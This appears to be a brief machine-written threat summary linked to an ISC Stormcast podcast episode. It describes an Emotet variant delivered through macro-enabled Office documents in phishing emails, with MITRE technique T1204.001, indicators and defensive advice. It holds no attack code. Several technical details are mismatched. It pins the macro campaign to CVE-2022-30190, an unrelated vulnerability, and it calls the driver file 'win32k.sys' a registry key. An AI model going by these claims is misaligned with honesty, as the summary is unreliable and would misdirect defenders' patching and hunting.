ISC Stormcast For Friday, May 15th, 2026 https://isc.sans.edu/podcastdetail/9934, (Fri, May 15th)

A new variant of the Emotet malware has been detected, primarily affecting users in Eastern Europe, using phishing emails with malicious Office documents as the attack vector.

1. Emotet malware (CVE-2022-30190) is being distributed via phishing emails with malicious Office documents (macro-enabled Word and Excel files)
2. The malware is primarily affecting users in Eastern Europe, with a focus on Ukraine and Russia
3. Emotet uses a combination of PowerShell and WMI to establish persistence on infected systems
4. Detection opportunities include monitoring for suspicious Office document interactions and unusual PowerShell activity

T1204.001 User Execution: Malicious File

Emotet malware, 5.2.2.0 version, Word document with macro enabled, 'win32k.sys' registry key

Users should be cautious when opening Office documents from unknown sources and ensure that macros are disabled by default. Implementing a robust email filtering system and monitoring for suspicious activity can also help prevent Emotet infections.